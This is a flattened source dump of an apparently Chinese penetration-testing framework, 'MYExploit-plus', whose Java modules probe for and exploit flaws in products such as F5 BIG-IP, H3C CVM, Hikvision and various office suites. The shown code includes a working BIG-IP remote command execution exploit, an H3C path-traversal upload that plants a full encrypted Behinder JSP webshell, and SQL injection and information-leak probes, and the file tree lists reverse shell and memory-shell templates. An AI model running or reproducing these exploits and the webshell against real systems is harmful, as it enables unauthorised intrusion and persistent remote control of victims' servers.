├── NewVersionUrl ├── README.md ├── img ├── image-20240110105025032.png ├── image-20240110105111699.png ├── image-20240110105403304.png ├── image-20240110110508003.png ├── image-20240110111028682.png └── image-20240110114453028.png ├── lib ├── NCLogin65.jar ├── basic.jar ├── borland_bin_client.jar ├── cglib-nodep-2.2.jar ├── dl.jar ├── fwpub.jar ├── granite.jar ├── log.jar ├── uapwstool.jar └── xerces.jar └── src └── main └── java └── com └── achuna33 ├── Controllers ├── AnHengController.java ├── BasicController.java ├── BasicMapping.java ├── Console.java ├── Controller.java ├── CustomController.java ├── DaHuaController.java ├── F5BigipController.java ├── FumengYunController.java ├── H3CController.java ├── HIKVISIONController.java ├── HuaTianController.java ├── JhSoftController.java ├── JinShanController.java ├── KingdeeController.java ├── LandrayController.java ├── QiAnXinController.java ├── SangForController.java ├── SeeyonController.java ├── SerializedDataController.java ├── SpringController.java ├── TRXController.java ├── TongDaController.java ├── VulnerabilityDescriptionMapping.java ├── WanhuController.java ├── WeaverController.java ├── WeaverEMoblieController.java ├── WeaverEOfficeController.java ├── XYController.java ├── XinDianController.java ├── YiSaitongController.java ├── YimiController.java ├── YongyouController.java ├── ehrController.java ├── fineReportController.java └── iofficeController.java ├── Exceptions ├── IncorrectParamsException.java ├── NullMethodArgsException.java ├── UnSupportedActionTypeException.java ├── UnSupportedGadgetTypeException.java └── UnSupportedPayloadTypeException.java ├── Gadgets ├── C3P0.java ├── CommonsBeanutils1.java ├── CommonsBeanutils2.java ├── CommonsCollectionsK1.java ├── CommonsCollectionsK2.java ├── JRMPClient.java ├── JRMPClient2.java ├── JRMPClientExploit.java ├── Jdk7u21.java ├── Jre8u20.java ├── RMIRegistryExploitJdk8u231.java ├── URLDNS.java └── utils │ ├── ClassFiles.java │ ├── ExecCheckingSecurityManager.java │ ├── Gadgets.java │ ├── Reflections.java │ └── Util.java ├── MainApplication.java ├── SupportType ├── GadgetType.java ├── MyDIYType.java ├── PayloadType.java ├── Poc_Exp.java ├── SupportType.java └── SupportVul.java ├── Templates ├── CommandEchoTemplate.java ├── CommandTemplate.java ├── DnslogTemplate.java ├── DynamicFilterTemplate.java ├── DynamicInterceptorTemplate.java ├── JettyMemshellTemplate.java ├── MyClassLoader.java ├── NettyMemshellTemplate.java ├── PutfileTemplate.java ├── ReverseShellTemplate.java ├── Template.java ├── TomcatEchoTemplate.java ├── TomcatMemshellTemplate1.java ├── TomcatMemshellTemplate2.java └── myClassTemplate.java ├── UI └── UIController.java ├── Update └── Update.java └── Utils ├── AESEncodeMain.java ├── ASMChanger.java ├── Cache.java ├── DNSLOG.java ├── HttpRequest.java ├── Intruder.java ├── MyURLClassLoader.java └── Response.java /NewVersionUrl: -------------------------------------------------------------------------------- 1 | https://github.com/zhaoyumi/MYExploit/releases/download/v2.0.5/MYExploit-2.0.5-SNAPSHOT.jar -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

🌟MYExploit-plus

2 | 3 | ![Static Badge](https://img.shields.io/badge/author-duidui-blue) 4 | 5 | 6 | ## 项目简介 7 | 二开修改的工具:https://github.com/achuna33/MYExploit 8 | 9 | 一款扩展性高的渗透测试框架渗透测试框架(完善中) 10 | 11 | 新增了泛微、用友、亿赛通等多种漏洞集合。 12 | 13 | 14 | ### 长期改Buging And 目前只支持部分EXP 利用 (慢慢写ing) 15 | 16 | ~~😘喜欢就给个star吧!~~ 17 | 18 | ![image-20240110105025032](img/image-20240110105025032.png) 19 | 20 | 21 | ![image-20240110105111699](img/image-20240110105111699.png) 22 | 23 | ![image-20240110105403304](img/image-20240110105403304.png) 24 | 25 | ![image-20240110110508003](img/image-20240110110508003.png) 26 | 27 | ![image-20240110111028682](img/image-20240110111028682.png) 28 | 29 | ![image-20240110114453028](img/image-20240110114453028.png) 30 | 31 | 32 | 33 | ## 使用声明 34 | 本工具仅用于安全测试目的 35 | 用于非法用途与开发者无关 36 | 37 | -------------------------------------------------------------------------------- /img/image-20240110105025032.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/img/image-20240110105025032.png -------------------------------------------------------------------------------- /img/image-20240110105111699.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/img/image-20240110105111699.png -------------------------------------------------------------------------------- /img/image-20240110105403304.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/img/image-20240110105403304.png -------------------------------------------------------------------------------- /img/image-20240110110508003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/img/image-20240110110508003.png -------------------------------------------------------------------------------- /img/image-20240110111028682.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/img/image-20240110111028682.png -------------------------------------------------------------------------------- /img/image-20240110114453028.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/img/image-20240110114453028.png -------------------------------------------------------------------------------- /lib/NCLogin65.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/NCLogin65.jar -------------------------------------------------------------------------------- /lib/basic.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/basic.jar -------------------------------------------------------------------------------- /lib/borland_bin_client.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/borland_bin_client.jar -------------------------------------------------------------------------------- /lib/cglib-nodep-2.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/cglib-nodep-2.2.jar -------------------------------------------------------------------------------- /lib/dl.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/dl.jar -------------------------------------------------------------------------------- /lib/fwpub.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/fwpub.jar -------------------------------------------------------------------------------- /lib/granite.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/granite.jar -------------------------------------------------------------------------------- /lib/log.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/log.jar -------------------------------------------------------------------------------- /lib/uapwstool.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/uapwstool.jar -------------------------------------------------------------------------------- /lib/xerces.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhaoyumi/MYExploit/bafcaab548c0bce5074fd14510ba3f37e19ad174/lib/xerces.jar -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/AnHengController.java: -------------------------------------------------------------------------------- 1 | 2 | package com.achuna33.Controllers; 3 | 4 | import com.achuna33.SupportType.Poc_Exp; 5 | import com.achuna33.SupportType.SupportVul; 6 | import com.achuna33.Utils.Cache; 7 | import com.achuna33.Utils.HttpRequest; 8 | import com.achuna33.Utils.Response; 9 | 10 | import java.net.MalformedURLException; 11 | @BasicMapping(uri = "安恒") 12 | public class AnHengController extends Controller implements BasicController{ 13 | @VulnerabilityDescriptionMapping(Description = "安恒 安恒信息-明御WAF report.m 任意用户登录",SupportVulType = SupportVul.信息泄露) 14 | public void vul_user(Poc_Exp type, String target, Object... args) throws MalformedURLException { 15 | WriteLog("\n开始检测: vul_user_任意用户登录"); 16 | 17 | 18 | switch (type){ 19 | case EXP: 20 | break; 21 | case POC: 22 | HttpRequest httpRequest = new HttpRequest(target+"/report.m?a=rpc-timed"); 23 | Response result = httpRequest.Get(""); 24 | 25 | 26 | if(result.responseBody.contains("error_0x110005")&&result.statusCode==200){ 27 | WriteLog("\n 存在漏洞"); 28 | WriteLog("\n请求地址:"+target+"/report.m?a=rpc-timed\r\n"); 29 | WriteLog("请求完成后访问目标ip:端口\r\n"); 30 | WriteLog(target+"/config.m?a=management上传特定dat文件可rce"); 31 | // WriteLog("\n"+result1.responseBody); 32 | }else { 33 | WriteLog("\n[-] 不存在漏洞"); 34 | } 35 | } 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/BasicController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | public interface BasicController { 4 | 5 | } 6 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/BasicMapping.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import java.lang.annotation.ElementType; 4 | import java.lang.annotation.Retention; 5 | import java.lang.annotation.RetentionPolicy; 6 | import java.lang.annotation.Target; 7 | 8 | @Retention(RetentionPolicy.RUNTIME) 9 | @Target(ElementType.TYPE) 10 | public @interface BasicMapping { 11 | String uri(); 12 | } 13 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/Console.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.Exceptions.NullMethodArgsException; 4 | import com.achuna33.Gadgets.utils.Util; 5 | import com.achuna33.SupportType.Poc_Exp; 6 | import com.achuna33.UI.UIController; 7 | import com.achuna33.Utils.Cache; 8 | import com.achuna33.Utils.Utils; 9 | 10 | import java.io.File; 11 | import java.lang.reflect.InvocationTargetException; 12 | import java.lang.reflect.Method; 13 | import java.net.MalformedURLException; 14 | import java.net.URL; 15 | import java.util.List; 16 | 17 | import static com.achuna33.Utils.Cache.WriteLogBase; 18 | 19 | public class Console extends Thread { 20 | 21 | public static String MethodName ; 22 | public static String Product; 23 | public Object[] args; 24 | @Override 25 | public void run() { 26 | try { 27 | 28 | Method runMethod = this.getClass().getMethod(MethodName,String.class); 29 | runMethod.invoke(this,Product); 30 | } catch (NoSuchMethodException e) { 31 | e.printStackTrace(); 32 | } catch (InvocationTargetException e) { 33 | e.printStackTrace(); 34 | } catch (IllegalAccessException e) { 35 | e.printStackTrace(); 36 | } 37 | } 38 | public void setMethodName(String methodName){ 39 | MethodName = methodName; 40 | } 41 | public void setProduct(String product){ 42 | Product = product; 43 | } 44 | public void setArgs(Object... objects){ 45 | args = objects; 46 | } 47 | 48 | public void GoPoc(String product) throws InvocationTargetException, IllegalAccessException, NullMethodArgsException, MalformedURLException { 49 | BasicController controller = Cache.routes.get(product); 50 | String target; 51 | if (this.args!=null){ 52 | target =(String) args[0]; 53 | String id =String.valueOf(Thread.currentThread().getId()) ; 54 | 55 | String log_name = Cache.uiController.LogDirPath+ File.separator+ new URL(target).getHost().toString()+"_"+ Utils.getRandomString(4) +"_log.log"; 56 | Cache.ThreadIdForLog.put(id,log_name); 57 | System.out.println("\n//->>开始扫描 "+target); 58 | 59 | }else { 60 | target = Cache.uiController.targetAddress.getText(); 61 | WriteLogBase("\n//->>开始扫描 "+ Cache.uiController.SupportType.getValue()+"的 所有POC\n"); 62 | } 63 | 64 | 65 | String VulName = Cache.uiController.SupportVul.getValue(); 66 | String Vultype = Cache.uiController.SupportType.getValue(); 67 | if(Vultype.equals("Spring")){ 68 | if (target.endsWith("/")){ 69 | target = target.substring(0,target.lastIndexOf("/")); 70 | } 71 | }else { 72 | target = getUrl(target); 73 | } 74 | if (VulName.equals("All")){ 75 | List methodList = Cache.getVulRoutesValue(product); 76 | for (Method method: methodList){ 77 | try { 78 | System.out.println(method.getName()); 79 | method.invoke(controller, Poc_Exp.POC,target,args); 80 | }catch (Exception e){ 81 | System.out.println("invoke methos:"+method.getName()+"时出现错误"); 82 | // Controller.WriteLog("\n[*] invoke method:"+method.getName()+"时出现错误"); 83 | } 84 | 85 | } 86 | }else { 87 | List methodList = Cache.getVulRoutesValue(product); 88 | for (Method method: methodList){ 89 | if (method.getName().equals(VulName)){ 90 | try { 91 | WriteLogBase("\n[*]开始检测 "+method.getName()+":"); 92 | method.invoke(controller, Poc_Exp.POC,target,args); 93 | break; 94 | }catch (Exception e){ 95 | System.out.println("invoke methos:"+method.getName()+"时出现错误"); 96 | Controller.WriteLog("\n[*] invoke method:"+method.getName()+"时出现错误"); 97 | } 98 | } 99 | } 100 | } 101 | 102 | } 103 | 104 | public void GoExp(String product) throws MalformedURLException { 105 | Cache.uiController.PublicArea.setText(""); 106 | Cache.uiController.PublicArea.appendText("[*]开始:\n"); 107 | BasicController controller = Cache.routes.get(Product); 108 | String target = Cache.uiController.targetAddress.getText(); 109 | target = getUrl(target); 110 | String VulName = Cache.uiController.SupportVul.getValue(); 111 | if (VulName.equals("All")){ 112 | Controller.WriteLog("\n[*] 指定利用漏洞"); 113 | return; 114 | } 115 | List methodList = Cache.getVulRoutesValue(product); 116 | for (Method method: methodList){ 117 | if (method.getName().equals(VulName)){ 118 | try { 119 | WriteLogBase("\n[*]开始检测 "+method.getName()+":"); 120 | method.invoke(controller, Poc_Exp.EXP,target,args); 121 | break; 122 | }catch (Exception e){ 123 | System.out.println("[*]invoke methos:"+method.getName()+"时出现错误"); 124 | Controller.WriteLog("\n[*] invoke method:"+method.getName()+"时出现错误"); 125 | } 126 | } 127 | } 128 | } 129 | 130 | 131 | public static String getUrl(String target) throws MalformedURLException { 132 | URL url = new URL(target); 133 | String result = ""; 134 | String port = ""; 135 | result = url.getProtocol()+"://"+url.getHost(); 136 | if (url.getPort()<=-1){ 137 | 138 | }else { 139 | result +=":"+url.getPort(); 140 | } 141 | return result; 142 | } 143 | public static void main(String[] args) throws MalformedURLException { 144 | URL url = new URL("http://127.0.0.1/index"); 145 | System.out.println(url.getProtocol()); 146 | System.out.println(url.getHost()); 147 | System.out.println(url.getPort()); 148 | } 149 | } 150 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/Controller.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.UI.UIController; 4 | import com.achuna33.Utils.Cache; 5 | import javafx.application.Platform; 6 | 7 | import java.io.File; 8 | import java.io.FileWriter; 9 | import java.io.IOException; 10 | import java.io.PrintWriter; 11 | 12 | import static com.achuna33.Utils.Cache.WriteLogBase; 13 | 14 | public class Controller { 15 | public static Boolean FileOrLogArea = false; 16 | public static void WriteLog(String text){ 17 | if (!text.startsWith("\n[")){ 18 | text = text.replace("\n",""); 19 | text ="\n[*]" +text; 20 | } 21 | 22 | if (Cache.uiController.targetAddress.getText().startsWith("file:")){ 23 | System.out.println(Thread.currentThread().getId()); 24 | String id = String.valueOf(Thread.currentThread().getId()) ; 25 | String path = Cache.ThreadIdForLog.get(id); 26 | WriteLog2File(path,text); 27 | }else { 28 | //Cache.uiController.logTextArea.setStyle("-fx-highlight-fill: lightgray; -fx-highlight-text-fill: firebrick; -fx-font-size: 20px;"); 29 | WriteLogBase(text); 30 | } 31 | } 32 | public static void WriteExpLog(String text){ 33 | if (!text.startsWith("\n[")){ 34 | text = text.replace("\n",""); 35 | text ="\n[*]" +text; 36 | } 37 | 38 | Cache.uiController.PublicArea.appendText(text); 39 | } 40 | public static void WriteLog2File(String filePath,String Content) { 41 | FileWriter fw = null; 42 | try { 43 | //如果文件存在,则追加内容;如果文件不存在,则创建文件 44 | filePath = java.net.URLDecoder.decode(filePath,"UTF-8"); 45 | if (System.getProperties().getProperty("os.name").toLowerCase().contains("mac os")){ 46 | filePath = "/" + filePath; 47 | } 48 | File f=new File(filePath); 49 | if (!f.exists()){ 50 | f.createNewFile(); 51 | } 52 | fw = new FileWriter(f, true); 53 | } catch (IOException e) { 54 | e.printStackTrace(); 55 | } 56 | PrintWriter pw = new PrintWriter(fw); 57 | pw.println(Content); 58 | pw.flush(); 59 | try { 60 | fw.flush(); 61 | pw.close(); 62 | fw.close(); 63 | } catch (IOException e) { 64 | e.printStackTrace(); 65 | } 66 | } 67 | 68 | public static void WriteSuccessLog(String text){ 69 | if (text.startsWith("\n[*]")||text.startsWith("\n[+]")){ 70 | text = text.substring(4); 71 | text = "\n[+]"+ text; 72 | WriteLogBase(text); 73 | }else { 74 | text = "\n[+]"+ text; 75 | WriteLogBase(text); 76 | } 77 | } 78 | public static void WriteFailLog(String text){ 79 | if (text.startsWith("\n[*]")){ 80 | text = text.substring(4); 81 | text = "\n[-]"+ text; 82 | WriteLogBase(text); 83 | }else if (text.startsWith("[*]")){ 84 | text = text.substring(3); 85 | text = "\n[-]"+ text; 86 | WriteLogBase(text); 87 | } else { 88 | text = "\n[-]"+ text; 89 | WriteLogBase(text); 90 | } 91 | } 92 | 93 | 94 | } 95 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/CustomController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.HttpRequest; 6 | import com.achuna33.Utils.Response; 7 | 8 | import java.net.MalformedURLException; 9 | 10 | @BasicMapping(uri = "路径扫描") 11 | public class CustomController extends Controller implements BasicController{ 12 | @VulnerabilityDescriptionMapping(Description = "信息泄漏(目录爆破)",SupportVulType = SupportVul.信息泄露) 13 | public void vul_DirSearch(Poc_Exp type, String target, Object... args)throws MalformedURLException { 14 | switch (type){ 15 | case EXP: 16 | break; 17 | case POC: 18 | System.out.format("\33[32;4m我是博主%n");//%n表示换行 19 | System.out.format("\33[32;4m我是你爹%n"); 20 | } 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/F5BigipController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | import com.achuna33.SupportType.Poc_Exp; 3 | import com.achuna33.SupportType.SupportVul; 4 | import com.achuna33.Utils.HttpRequest; 5 | import com.achuna33.Utils.Response; 6 | import com.achuna33.Utils.Utils; 7 | 8 | import java.net.MalformedURLException; 9 | 10 | @BasicMapping(uri = "F5") 11 | public class F5BigipController extends Controller implements BasicController{ 12 | @VulnerabilityDescriptionMapping(Description = "BIG-IP 远程命令执行漏洞",SupportVulType = SupportVul.RuntimeExec) 13 | public void vul_c_命令执行(Poc_Exp type, String target, Object... args) throws MalformedURLException { 14 | WriteLog("\n[*]开始检测: BIG-IP 远程命令执行漏洞 远程命令执行漏洞"); 15 | 16 | 17 | switch (type){ 18 | case EXP: 19 | String command = (String) args[0]; 20 | HttpRequest httpRequest1 = new HttpRequest(target+"/mgmt/tm/util/bash"); 21 | String data2 = "{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}"; 22 | httpRequest1.addHeaders("Host","127.0.0.1"); 23 | httpRequest1.addHeaders("Authorization","Basic YWRtaW46"); 24 | httpRequest1.addHeaders("X-F5-Auth-Token","a"); 25 | httpRequest1.addHeaders("Content-type",""); 26 | httpRequest1.addHeaders("Accept-Encoding"," gzip, deflate"); 27 | httpRequest1.addHeaders("Content-type","application/json"); 28 | httpRequest1.addHeaders("Accept","*/*"); 29 | httpRequest1.addHeaders("referer","127.0.0.1"); 30 | httpRequest1.addHeaders("ConnectioN","close, X-F5-Auth-Token"); 31 | Response result1 = httpRequest1.Post(data2.replace("id",command)); 32 | WriteLog(result1.responseBody); 33 | break; 34 | case POC: 35 | HttpRequest httpRequest = new HttpRequest(target+"/mgmt/tm/util/bash"); 36 | String data = "{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}"; 37 | httpRequest.addHeaders("Host","localhost"); 38 | httpRequest.addHeaders("Authorization","Basic YWRtaW46"); 39 | httpRequest.addHeaders("X-F5-Auth-Token","a"); 40 | httpRequest.addHeaders("Content-type","application/json"); 41 | // httpRequest.addHeaders("Content-type",""); 42 | httpRequest.addHeaders("referer","127.0.0.1"); 43 | // System.out.println(httpRequest.getClass()); 44 | httpRequest.addHeaders("Accept-Encoding"," gzip, deflate"); 45 | httpRequest.addHeaders("Accept","*/*"); 46 | httpRequest.addHeaders("ConnectioN","close, X-F5-Auth-Token"); 47 | Response result = httpRequest.Post(data); 48 | if(result.responseBody.contains("uid=")&&result.statusCode==200){ 49 | WriteLog("\n[*] 存在漏洞"); 50 | WriteLog("\n[*]请求地址:"+target+"/mgmt/tm/util/bash"+"未写exp,建议抓包到burp自行修改命令"); 51 | WriteLog("\n"+result.responseBody); 52 | }else { 53 | WriteLog("\n[-] 不存在漏洞"); 54 | } 55 | } 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/FumengYunController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | 4 | import com.achuna33.SupportType.Poc_Exp; 5 | import com.achuna33.SupportType.SupportVul; 6 | import com.achuna33.Utils.Cache; 7 | import com.achuna33.Utils.HttpRequest; 8 | import com.achuna33.Utils.Response; 9 | 10 | @BasicMapping(uri = "孚盟云") 11 | public class FumengYunController extends Controller implements BasicController{ 12 | @VulnerabilityDescriptionMapping(Description="孚盟云 AjaxMethod.ashx SQL注入漏洞" ,SupportVulType= SupportVul.SQLInjection) 13 | public void vul_Getfile(Poc_Exp type, String target, Object... args) throws Exception { 14 | WriteLog("\n开始检测: 孚盟云 AjaxMethod.ashx SQL注入漏洞"); 15 | 16 | switch (type){ 17 | case EXP: 18 | break; 19 | case POC: 20 | 21 | HttpRequest httpRequest = new HttpRequest(target+"/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27"); 22 | Response result = httpRequest.Get(""); 23 | if(result.responseBody.toLowerCase().contains("'Y'")){ 24 | WriteLog(" 存在漏洞"); 25 | WriteLog(result.responseBody); 26 | }else { 27 | WriteLog(" 不存在漏洞"); 28 | } 29 | WriteLog("\n"+result.responseBody); 30 | } 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/H3CController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.HttpRequest; 6 | import com.achuna33.Utils.Response; 7 | import com.achuna33.Utils.Utils; 8 | 9 | import java.net.MalformedURLException; 10 | 11 | @BasicMapping(uri = "H3C") 12 | public class H3CController extends Controller implements BasicController{ 13 | @VulnerabilityDescriptionMapping(Description="H3C_CVM_前台任意文件上传漏洞" ,SupportVulType= SupportVul.UploadFile) 14 | public void vul_H3C_CVM(Poc_Exp type, String target, Object... args) throws Exception { 15 | WriteLog("\n[*]开始检测: H3C_CVM_前台任意文件上传漏洞"); 16 | String data = "shellcode"; 17 | String url2 = "/cas/js/lib/buttons/iconfig.jsp"; 18 | String url = "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/iconfig.jsp&name=222"; 19 | switch (type){ 20 | case EXP: 21 | String path = null; 22 | String mypayload = null; 23 | try { 24 | path = (String) args[0]; 25 | try { 26 | byte[] bytes = Utils.readFile(path); 27 | mypayload = new String(bytes); 28 | }catch (Exception e){ 29 | WriteExpLog("\n [*] 文件读取失败"); 30 | } 31 | }catch (Exception e){ 32 | 33 | } 34 | String payload = "<%@page import=\"java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*\" %>\n" + 35 | "<%!\n" + 36 | "private byte[] Decrypt(byte[] data) throws Exception\n" + 37 | "{\n" + 38 | " String key=\"e45e329feb5d925b\";\n" + 39 | "\tfor (int i = 0; i < data.length; i++) {\n" + 40 | "\t\tdata[i] = (byte) ((data[i]) ^ (key.getBytes()[i + 1 & 15]));\n" + 41 | "\t}\n" + 42 | "\treturn data;\n" + 43 | "}\n" + 44 | "%>\n" + 45 | " <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return\n" + 46 | " super.defineClass(b,0,b.length);}}%>\n" + 47 | " <%if (request.getMethod().equals(\"POST\")){\n" + 48 | " ByteArrayOutputStream bos = new ByteArrayOutputStream();\n" + 49 | " byte[] buf = new byte[512];\n" + 50 | " int length=request.getInputStream().read(buf);\n" + 51 | " while (length>0)\n" + 52 | " {\n" + 53 | " byte[] data= Arrays.copyOfRange(buf,0,length);\n" + 54 | " bos.write(data);\n" + 55 | " length=request.getInputStream().read(buf);\n" + 56 | " }\n" + 57 | " new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);}\n" + 58 | " %>"; 59 | 60 | if (mypayload!=null){ 61 | payload = mypayload; 62 | }else { 63 | WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond"); 64 | } 65 | String expshellpath = Utils.getRandomString(4)+".jsp"; 66 | url = url.replace("iconfig.jsp",expshellpath); 67 | HttpRequest httpRequest3 = new HttpRequest(target+url); 68 | httpRequest3.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31"); 69 | httpRequest3.addHeaders("Content-range"," bytes 0-10/20"); 70 | httpRequest3.addHeaders("Accept-Encoding"," gzip, deflate"); 71 | httpRequest3.addHeaders("Content-type",""); 72 | httpRequest3.addHeaders("Accept-Language"," zh-CN,zh;q=0.9"); 73 | httpRequest3.addHeaders("Accept"," text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"); 74 | data = data.replace("shellcode",payload); 75 | 76 | httpRequest3.Post(data); 77 | 78 | Response result1 = new HttpRequest(target +url2.replace("iconfig.jsp",expshellpath)).Get(""); 79 | if(result1.statusCode==200){ 80 | WriteExpLog("\n[*] shell path:\n"+target +url2.replace("iconfig.jsp",expshellpath)); 81 | }else { 82 | WriteExpLog("\n 访问失败:\n"+target +url2.replace("iconfig.jsp",expshellpath)); 83 | WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性"); 84 | 85 | } 86 | break; 87 | case POC: 88 | String shellpath = Utils.getRandomString(4)+".jsp"; 89 | String poc = "c0bb4ba866309a864d22f8853e8f7213"; 90 | HttpRequest httpRequest2 = new HttpRequest(target+url.replace("iconfig.jsp",shellpath)); 91 | httpRequest2.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31"); 92 | httpRequest2.addHeaders("Content-range"," bytes 0-10/20"); 93 | httpRequest2.addHeaders("Accept-Encoding"," gzip, deflate"); 94 | httpRequest2.addHeaders("Content-type",""); 95 | httpRequest2.addHeaders("Accept-Language"," zh-CN,zh;q=0.9"); 96 | httpRequest2.addHeaders("Accept"," text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"); 97 | httpRequest2.Post(data.replace("shellcode",poc)); 98 | Response result = new HttpRequest(target+url2.replace("iconfig.jsp",shellpath)).Get(""); 99 | if(result.responseBody.contains("c0bb4ba866309a864d22f8853e8f7213")&&result.statusCode==200){ 100 | WriteLog("\n[*] 存在漏洞"); 101 | WriteLog("访问:"+target +url2.replace("iconfig.jsp",shellpath)); 102 | }else { 103 | WriteLog("\n[-] 不存在漏洞"); 104 | } 105 | } 106 | } 107 | 108 | @VulnerabilityDescriptionMapping(Description="H3C_H3C_ERXXXG2敏感信息泄露漏洞" ,SupportVulType= SupportVul.信息泄露) 109 | public void vul_H3C_ERXXXG2(Poc_Exp type, String target, Object... args) throws Exception { 110 | WriteLog("\n[*]开始检测: H3C_H3C_ERXXXG2敏感信息泄露漏洞"); 111 | String url = "/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg"; 112 | switch (type) { 113 | case POC: 114 | HttpRequest httpRequest = new HttpRequest(target + url); 115 | Response result = httpRequest.Get(""); 116 | if (result.statusCode == 200 && result.responseBody.contains("$sys@base")) { 117 | WriteLog("\n[*] 存在漏洞"); 118 | WriteLog("\n[*] (burp方包GET)漏洞链接:" + target + url); 119 | } else { 120 | WriteLog("\n[*] 不存在漏洞"); 121 | } 122 | case EXP: 123 | break; 124 | } 125 | } 126 | 127 | } 128 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/HIKVISIONController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.*; 6 | 7 | import java.net.MalformedURLException; 8 | 9 | @BasicMapping(uri = "海康威视") 10 | public class HIKVISIONController extends Controller implements BasicController{ 11 | @VulnerabilityDescriptionMapping(Description = "海康威视综合安防 lm 文件上传漏洞",SupportVulType = SupportVul.UploadFile) 12 | public void vul_lm_Uploadfile(Poc_Exp type, String target, Object... args) throws MalformedURLException { 13 | WriteLog("\n[*]开始检测: 海康威视综合安防 lm 文件上传漏洞"); 14 | String randomStr = Utils.getRandomString(4)+".jsp"; 15 | String url = "/lm/api/files;.css"; 16 | String data = "------WebKitFormBoundary9PggsiM755PLa54a\n" + 17 | "Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/lm/filename\"\n" + 18 | "Content-Type: application/zip\n" + 19 | "\n" + 20 | "\n" + 21 | "Yep!\n" + 22 | 